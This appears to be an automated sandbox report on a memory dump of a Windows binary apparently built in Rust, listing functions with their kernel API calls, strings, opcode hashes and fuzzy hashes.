Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$DescriptionErrorFreeLastThread
String ID:
API String ID: 2227028877-0
Opcode ID: e5d2270e40d49baa06ba0499d32ca6e07565d90f9b6f8b2c0dac18db19cbdc1f
Instruction ID: d2dc352da669c5864b9359ce70e7310a4b024632fbb458cc11c0cfb1203e26c8
Opcode Fuzzy Hash: e5d2270e40d49baa06ba0499d32ca6e07565d90f9b6f8b2c0dac18db19cbdc1f
Instruction Fuzzy Hash: 3621651AA089C641EA24BA9EE4143E9D751DBABFD0FC48075DF8D077ADDE3CE4818310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF7248E0, Relevance: 6.3, APIs: 5, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF7BF72493C
HeapFree.KERNEL32 ref: 00007FF7BF724949

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 8dc6fd65c94249f23ff2f02f4063865e29e6fdb213bf09c6095539a547deae2e
Instruction ID: 4be61c077f1befcd7fbcef3a3bdc6a7303a80d310c84d18c85840547bf60ef6b
Opcode Fuzzy Hash: 8dc6fd65c94249f23ff2f02f4063865e29e6fdb213bf09c6095539a547deae2e
Instruction Fuzzy Hash: 2B118159B1959201FA61B9DA5A016F6D4826F6AFD0FD58070DF9D17BCEEC3CD5014220

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF72AF10, Relevance: 6.3, APIs: 5, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF7BF72AF6A
HeapFree.KERNEL32 ref: 00007FF7BF72AF77

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 57bdfb658217eab1aaaf7ed565af51a77499cfd4bbcb6b2ed4c8521d7343a3d2
Instruction ID: f5f40c26a237df07edc77880fc3ddef2e42c33736109898abdf2b4d4b7a6388f
Opcode Fuzzy Hash: 57bdfb658217eab1aaaf7ed565af51a77499cfd4bbcb6b2ed4c8521d7343a3d2
Instruction Fuzzy Hash: 39119099B1859201FA61759A5D001F5D491AF6FFD0FC48470EF9C17BCEED3CE6024120

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF7319E3, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF7BF731A12
GetLastError.KERNEL32 ref: 00007FF7BF731A5C

Strings

called `Option::unwrap()` on a `None` value, xrefs: 00007FF7BF731A4C, 00007FF7BF731AB8

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseErrorHandleLast
String ID: called `Option::unwrap()` on a `None` value
API String ID: 918212764-836832528
Opcode ID: e33f6254ffe64388b26511242d1061197c3af5b448f74a1cb373ba0542101f09
Instruction ID: e43d283daa0338384c1237894c486bba43ca27d97a08064e1520db20fda06330
Opcode Fuzzy Hash: e33f6254ffe64388b26511242d1061197c3af5b448f74a1cb373ba0542101f09
Instruction Fuzzy Hash: 7641B676A08A8591EA14AB5DD8403F8A360FB69F94FE44272CB2D477D8CF3CE456C320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF724D60, Relevance: 3.8, APIs: 3, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7BF7246C7), ref: 00007FF7BF724DEB
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7BF7246C7), ref: 00007FF7BF724DFA

Part of subcall function 00007FF7BF67B4D0: GetProcessHeap.KERNEL32(?,?,?,00007FF7BF67D529), ref: 00007FF7BF67B4DE

CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7BF7246C7), ref: 00007FF7BF724E16

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$CloseFreeHandle
String ID:
API String ID: 2022048041-0
Opcode ID: f12772b3ec4ee0c2d7a870925270aba5d378f7220ca0a0bac4346d64c333896c
Instruction ID: 114c4a9fc563dae65a54602a2fe9b9ad8ae8f85b2ce8bbfc7c85490e139c2b1c
Opcode Fuzzy Hash: f12772b3ec4ee0c2d7a870925270aba5d378f7220ca0a0bac4346d64c333896c
Instruction Fuzzy Hash: 9221952690C68182F720AB59E4413EAE751EBABB84FD08134DB8C576A9DF3DD086C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF73080B, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 300COMMON

Download Yara Rule

APIs

TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7BF730B89

Strings

i/o driver event store missing, xrefs: 00007FF7BF730CA0

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: AcquireExclusiveLock
String ID: i/o driver event store missing
API String ID: 4021432409-1516099523
Opcode ID: e06efa7698e92bd1dc809788e3875f7004808575da591f98070d6249d2c5a243
Instruction ID: 7736c2e5dd95dcc83db2fbff2b5a3805bbbd2f2e9d24eb3671c9d3eb0463b16c
Opcode Fuzzy Hash: e06efa7698e92bd1dc809788e3875f7004808575da591f98070d6249d2c5a243
Instruction Fuzzy Hash: A0D1A626A09AC592E660AB5DE4013E9B360FB6AF88FC44135DF8D17799DF3CE586C310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF67B460, Relevance: 3.8, APIs: 3, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000007,00000007,00007FF7BF68F243,?,?,?,00007FF7BF6A5BAC,?,?,?,?,00000000), ref: 00007FF7BF67B470
GetProcessHeap.KERNEL32(00000000,00000007,00000007,00007FF7BF68F243,?,?,?,00007FF7BF6A5BAC,?,?,?,?,00000000), ref: 00007FF7BF67B48F
HeapAlloc.KERNEL32(00000000,00000007,00000007,00007FF7BF68F243,?,?,?,00007FF7BF6A5BAC,?,?,?,?,00000000), ref: 00007FF7BF67B49E

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$Alloc
String ID:
API String ID: 651230671-0
Opcode ID: 16ba5921a0baa230aa9bf828a27d97fbbd409ce7cad1f4516967c477bb85b90b
Instruction ID: 5eff93e576900115a66744e347e462ad34b8ebf5b007fc65cb682a87a7e709f8
Opcode Fuzzy Hash: 16ba5921a0baa230aa9bf828a27d97fbbd409ce7cad1f4516967c477bb85b90b
Instruction Fuzzy Hash: 8EF03016B5A19241FA2976DB39415FD91824B9AFE4A898074DF5C06BCDFC6C54824310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF723680, Relevance: 3.1, APIs: 2, Instructions: 135filememoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF7BF7237CC
GetProcessHeap.KERNEL32 ref: 00007FF7BF72380E

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFileHeapProcess
String ID:
API String ID: 1145019889-0
Opcode ID: 931aef70bd7ae1b73475e7c8f7c82fd0841ed58a5fe3348e8114d586bd57b4a6
Instruction ID: eb041c740f6af2f62f17e699b2ba63a1009345670053ea1cb3b1007bdc433f6e
Opcode Fuzzy Hash: 931aef70bd7ae1b73475e7c8f7c82fd0841ed58a5fe3348e8114d586bd57b4a6
Instruction Fuzzy Hash: 1E51D6669082C143FBA55A6899403BAE6E0EB6FF54FD402B5CF5D033C8DB7CE8658360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF723AE0, Relevance: 3.0, APIs: 2, Instructions: 29fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF7BF723B19
GetLastError.KERNEL32 ref: 00007FF7BF723B2E

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: 3c644c31776223a57d554299aedba6e8765b2575b22625bd1b566aa9f0995475
Instruction ID: e5db92379def85557d1e2912c7366c69545fad4beee0834a052d9352383f07a4
Opcode Fuzzy Hash: 3c644c31776223a57d554299aedba6e8765b2575b22625bd1b566aa9f0995475
Instruction Fuzzy Hash: E5F09636614A8146E730ABA5B80079AE290D759754F808334EBFC877C4DF7DD1518B10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF723840, Relevance: 2.6, APIs: 2, Instructions: 83COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7BF7238FA
GetLastError.KERNEL32 ref: 00007FF7BF723918

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 73fdac780c48377372cd4321a71fec73b8e411a1a1ceb7c9c094de5ca8e1e41d
Instruction ID: d99b90e71ec7b31aff10dd91574500a3a5f5f1b719f9f5b859ac58281579097e
Opcode Fuzzy Hash: 73fdac780c48377372cd4321a71fec73b8e411a1a1ceb7c9c094de5ca8e1e41d
Instruction Fuzzy Hash: B231AD765087808BE3709B69F4407AAF7A0FB99354F905124EBC903B99DB7DE0818F10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF67C100, Relevance: 2.6, APIs: 2, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF7BF67C11A
HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF7BF67C127

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5cde65faadc4f70c8f10d05567cabefae8bd09fb0b7a7b48205eabc73333df20
Instruction ID: cbb5a6d3c4fa961778865949456af384def9277c1caad6413292c64cf44c1826
Opcode Fuzzy Hash: 5cde65faadc4f70c8f10d05567cabefae8bd09fb0b7a7b48205eabc73333df20
Instruction Fuzzy Hash: EFF0F622B096A103F619BBAB59005E99151BF5EFD4F888434EF1C07BCAEE3CE5A34310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF7239A0, Relevance: 1.3, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7BF7239F4

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: f43223607848c3236bdf8a5188e62e2436bf82002add2a3b0f5cc429c10bd719
Instruction ID: f9737a07426f3ff59c79fe7e0063a1547f1b5b1dce64cdad02e33ec577862978
Opcode Fuzzy Hash: f43223607848c3236bdf8a5188e62e2436bf82002add2a3b0f5cc429c10bd719
Instruction Fuzzy Hash: C901DD36A14BC142E770AB69F840799E290EB5AB90F904231EBE8477D4DF7CD4C18710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF723B60, Relevance: 1.3, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7BF723BA0

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 08bec05668763e61143465efbf4fdcac9b10d5bef6fd5fcb667b311e8db6ecd0
Instruction ID: 8070484277f7ade4855fd39926f8b38af2d4889113c239a1ace941e6cb781703
Opcode Fuzzy Hash: 08bec05668763e61143465efbf4fdcac9b10d5bef6fd5fcb667b311e8db6ecd0
Instruction Fuzzy Hash: E0F0B435A04B8282E730AB95F4403EAF3D0DB69B94F844070CBDD437A8DE3CE1518750

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF7BF726C00, Relevance: 42.6, APIs: 20, Strings: 4, Instructions: 573memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32 ref: 00007FF7BF726CA9
GetProcessHeap.KERNEL32 ref: 00007FF7BF726DD3
HeapFree.KERNEL32 ref: 00007FF7BF726DE0
ReleaseSRWLockExclusive.KERNEL32 ref: 00007FF7BF726DF1
GetProcessHeap.KERNEL32 ref: 00007FF7BF72716C
HeapFree.KERNEL32 ref: 00007FF7BF727179
GetProcessHeap.KERNEL32 ref: 00007FF7BF727264
HeapAlloc.KERNEL32 ref: 00007FF7BF727274
GetProcessHeap.KERNEL32 ref: 00007FF7BF72729A
HeapAlloc.KERNEL32 ref: 00007FF7BF7272AA
GetProcessHeap.KERNEL32 ref: 00007FF7BF7272C9
HeapAlloc.KERNEL32 ref: 00007FF7BF7272D9
GetProcessHeap.KERNEL32 ref: 00007FF7BF7275CA
HeapAlloc.KERNEL32 ref: 00007FF7BF7275DA
GetProcessHeap.KERNEL32 ref: 00007FF7BF7276B5
HeapAlloc.KERNEL32 ref: 00007FF7BF7276C5
GetProcessHeap.KERNEL32 ref: 00007FF7BF7276E0
HeapAlloc.KERNEL32 ref: 00007FF7BF7276F0

Strings

:, xrefs: 00007FF7BF726F58
formatter error, xrefs: 00007FF7BF727290, 00007FF7BF7276AB
stdout, xrefs: 00007FF7BF726C30
called `Result::unwrap()` on an `Err` valueC:\Users\yyy\.cargo\registry\src\github.com-1ecc6299db9ec823\zip-0.5.13\src\cp437.rs, xrefs: 00007FF7BF72733C, 00007FF7BF72767B

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$Alloc$ExclusiveFreeLock$AcquireRelease
String ID: :$called `Result::unwrap()` on an `Err` valueC:\Users\yyy\.cargo\registry\src\github.com-1ecc6299db9ec823\zip-0.5.13\src\cp437.rs$formatter error$stdout
API String ID: 3343015395-2579356816
Opcode ID: 5aa60ee5f85fe9f7e01d1c73b08fe9894657d1e64f8e674153392ca88b5d7e8b
Instruction ID: ac8ea6d1ef58854f1fb377f52aa2e7e118026922aae200fd675a4b585f072e27
Opcode Fuzzy Hash: 5aa60ee5f85fe9f7e01d1c73b08fe9894657d1e64f8e674153392ca88b5d7e8b
Instruction Fuzzy Hash: 61522C36609BC585EB61AB58E8403EAF3A5FB9AB44F844136DB8C03769EF3CD155CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF72B090, Relevance: 39.5, APIs: 26, Instructions: 533memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF7BF72B0AE
HeapAlloc.KERNEL32 ref: 00007FF7BF72B0BB
GetProcessHeap.KERNEL32 ref: 00007FF7BF72B18F
HeapFree.KERNEL32 ref: 00007FF7BF72B19C
GetProcessHeap.KERNEL32 ref: 00007FF7BF72B1B9
HeapFree.KERNEL32 ref: 00007FF7BF72B1C6
GetProcessHeap.KERNEL32 ref: 00007FF7BF72B201
HeapAlloc.KERNEL32 ref: 00007FF7BF72B211
GetLastError.KERNEL32 ref: 00007FF7BF72B25D
GetProcessHeap.KERNEL32 ref: 00007FF7BF72B279
HeapFree.KERNEL32 ref: 00007FF7BF72B286
GetProcessHeap.KERNEL32 ref: 00007FF7BF72B296
HeapFree.KERNEL32 ref: 00007FF7BF72B2A3
GetProcessHeap.KERNEL32 ref: 00007FF7BF72B2BB
HeapFree.KERNEL32 ref: 00007FF7BF72B2C8
GetProcessHeap.KERNEL32 ref: 00007FF7BF72B7AC
HeapFree.KERNEL32 ref: 00007FF7BF72B7B9
GetProcessHeap.KERNEL32 ref: 00007FF7BF72B9A3

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$Free$Alloc$ErrorLast
String ID:
API String ID: 3695440593-0
Opcode ID: 0cc5a1ff41e6afafaf91f50fd79bbffbd2ba7d687596c83dc165ebd6b5319928
Instruction ID: 260eb61d3b9ba4f1e0d95b1008ea58d72a727f634c3dea997fabfbecfe574f7c
Opcode Fuzzy Hash: 0cc5a1ff41e6afafaf91f50fd79bbffbd2ba7d687596c83dc165ebd6b5319928
Instruction Fuzzy Hash: 9C326119A0C7C181FA70B79D98453FAA2A0EB6BB94FC44179DB8D027DDEE7CE0858711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF71B1A0, Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 383memoryCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,?,00007FF7BF725D03,?,?,?,?,?,?,?,?), ref: 00007FF7BF71B1D6
WriteConsoleW.KERNEL32 ref: 00007FF7BF71B455
WriteConsoleW.KERNEL32 ref: 00007FF7BF71B4B6
GetLastError.KERNEL32 ref: 00007FF7BF71B4BF
GetLastError.KERNEL32 ref: 00007FF7BF71B59D
GetProcessHeap.KERNEL32 ref: 00007FF7BF71B5BD
HeapAlloc.KERNEL32 ref: 00007FF7BF71B5CD
GetProcessHeap.KERNEL32 ref: 00007FF7BF71B614
HeapAlloc.KERNEL32 ref: 00007FF7BF71B624
GetProcessHeap.KERNEL32 ref: 00007FF7BF71B643
HeapAlloc.KERNEL32 ref: 00007FF7BF71B653

Strings

called `Result::unwrap()` on an `Err` valueC:\Users\yyy\.cargo\registry\src\github.com-1ecc6299db9ec823\zip-0.5.13\src\cp437.rs, xrefs: 00007FF7BF71B72F

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocErrorLastProcess$ConsoleWrite
String ID: called `Result::unwrap()` on an `Err` valueC:\Users\yyy\.cargo\registry\src\github.com-1ecc6299db9ec823\zip-0.5.13\src\cp437.rs
API String ID: 112983666-3626884897
Opcode ID: 0c269472f43afeb41748f117e8fe922c80105af4844a328cd95cedbe41c30555
Instruction ID: f340895a20e93822e45944f746862120def1fdb209bfae8fc9c5aea7c0386063
Opcode Fuzzy Hash: 0c269472f43afeb41748f117e8fe922c80105af4844a328cd95cedbe41c30555
Instruction Fuzzy Hash: 0BE1062AE08A9242F724A79D94143F9E251EF6EF94FC54275DF9D432C9DE7CE2488320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF726160, Relevance: 19.9, APIs: 10, Strings: 3, Instructions: 370memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF7BF7262DC
GetProcessHeap.KERNEL32 ref: 00007FF7BF7264C5
HeapFree.KERNEL32 ref: 00007FF7BF7264D2
GetProcessHeap.KERNEL32 ref: 00007FF7BF726509
HeapAlloc.KERNEL32 ref: 00007FF7BF726519
GetProcessHeap.KERNEL32 ref: 00007FF7BF72653F
HeapAlloc.KERNEL32 ref: 00007FF7BF72654F
GetProcessHeap.KERNEL32 ref: 00007FF7BF72656E
HeapAlloc.KERNEL32 ref: 00007FF7BF72657E
LeaveCriticalSection.KERNEL32 ref: 00007FF7BF7265C3

Part of subcall function 00007FF7BF725140: GetProcessHeap.KERNEL32 ref: 00007FF7BF725381
Part of subcall function 00007FF7BF725140: HeapFree.KERNEL32 ref: 00007FF7BF72538E

Strings

advancing IoSlice beyond its length, xrefs: 00007FF7BF726650
called `Option::unwrap()` on a `None` value, xrefs: 00007FF7BF726286, 00007FF7BF7264EF
already borrowed, xrefs: 00007FF7BF726620

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$Alloc$CriticalFreeSection$EnterLeave
String ID: advancing IoSlice beyond its length$already borrowed$called `Option::unwrap()` on a `None` value
API String ID: 1348942571-3341816494
Opcode ID: 7b3ad78aa2c2c876c0b95b9c0badb3618dfe2e5a365fac6811925fabc637f5b3
Instruction ID: 7c87c77febb1e16cc6d34df6f466a33df1a3b3f52c046a35fce965eae3d664ec
Opcode Fuzzy Hash: 7b3ad78aa2c2c876c0b95b9c0badb3618dfe2e5a365fac6811925fabc637f5b3
Instruction Fuzzy Hash: 1FD1E566B085C242FA15EB999C042F9E351EBABF90FC48176EB9D0778DDE3CE5418310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7BF725140, Relevance: 19.7, APIs: 12, Strings: 1, Instructions: 234memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7BF71B1A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,00007FF7BF725D03,?,?,?,?,?,?,?,?), ref: 00007FF7BF71B1D6

GetProcessHeap.KERNEL32 ref: 00007FF7BF725284
HeapAlloc.KERNEL32 ref: 00007FF7BF725294
GetProcessHeap.KERNEL32 ref: 00007FF7BF7252BA
HeapAlloc.KERNEL32 ref: 00007FF7BF7252CA
GetProcessHeap.KERNEL32 ref: 00007FF7BF7252E9
HeapAlloc.KERNEL32 ref: 00007FF7BF7252F9
GetProcessHeap.KERNEL32 ref: 00007FF7BF725381
HeapFree.KERNEL32 ref: 00007FF7BF72538E

Strings

called `Option::unwrap()` on a `None` value, xrefs: 00007FF7BF725447

Memory Dump Source

Source File: 00000001.00000002.230536519.00007FF7BF671000.00000020.00020000.sdmp, Offset: 00007FF7BF670000, based on PE: true

Associated: 00000001.00000002.230530079.00007FF7BF670000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.230878462.00007FF7BF86F000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.230893158.00007FF7BF871000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.230930490.00007FF7BF874000.00000002.00020000.sdmp Download File

Similarity

